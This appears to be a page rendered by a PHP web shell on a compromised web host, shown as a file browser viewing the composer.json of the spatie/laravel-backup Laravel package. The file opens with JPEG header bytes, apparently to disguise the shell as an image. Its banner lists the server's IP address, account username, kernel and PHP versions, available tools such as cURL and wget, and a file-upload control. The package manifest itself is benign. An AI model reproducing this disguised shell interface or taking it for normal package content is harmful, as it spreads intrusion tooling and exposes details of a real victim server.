����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.221.222.110 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirm.gltechlimited.com/vendor/spatie/laravel-backup/ |
Upload File : |
{ "name": "spatie/laravel-backup", "description": "A Laravel package to backup your application", "keywords": [ "spatie", "backup", "database", "laravel-backup" ], "homepage": "https://github.com/spatie/laravel-backup", "license": "MIT", "authors": [ { "name": "Freek Van der Herten", "email": "freek@spatie.be", "homepage": "https://spatie.be", "role": "Developer" } ], "require": { "php": "^8.0", "ext-zip": "^1.14.0", "illuminate/console": "^9.0|^10.0", "illuminate/contracts": "^9.0|^10.0", "illuminate/events": "^9.0|^10.0", "illuminate/filesystem": "^9.0|^10.0", "illuminate/notifications": "^9.0|^10.0", "illuminate/support": "^9.0|^10.0", "league/flysystem": "^3.0", "spatie/db-dumper": "^3.0", "spatie/laravel-package-tools": "^1.6.2", "spatie/laravel-signal-aware-command": "^1.2", "spatie/temporary-directory": "^2.0", "symfony/console": "^6.0", "symfony/finder": "^6.0" }, "require-dev": { "ext-pcntl": "*", "composer-runtime-api": "^2.0", "laravel/slack-notification-channel": "^2.5", "league/flysystem-aws-s3-v3": "^2.0|^3.0", "mockery/mockery": "^1.4", "nunomaduro/larastan": "^2.1", "orchestra/testbench": "^7.0|^8.0", "pestphp/pest": "^1.20", "phpstan/extension-installer": "^1.1", "phpstan/phpstan-deprecation-rules": "^1.0", "phpstan/phpstan-phpunit": "^1.1" }, "autoload": { "psr-4": { "Spatie\\Backup\\": "src" }, "files": [ "src/Helpers/functions.php" ] }, "autoload-dev": { "psr-4": { "Spatie\\Backup\\Tests\\": "tests" } }, "scripts": { "test": "vendor/bin/pest", "format": "vendor/bin/php-cs-fixer fix --allow-risky=yes", "analyse": "vendor/bin/phpstan analyse" }, "suggest": { "laravel/slack-notification-channel": "Required for sending notifications via Slack" }, "config": { "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "phpstan/extension-installer": true } }, "extra": { "laravel": { "providers": [ "Spatie\\Backup\\BackupServiceProvider" ] } }, "minimum-stability": "dev", "prefer-stable": true, "funding": [ { "type": "github", "url": "https://github.com/sponsors/spatie" }, { "type": "other", "url": "https://spatie.be/open-source/support-us" } ] }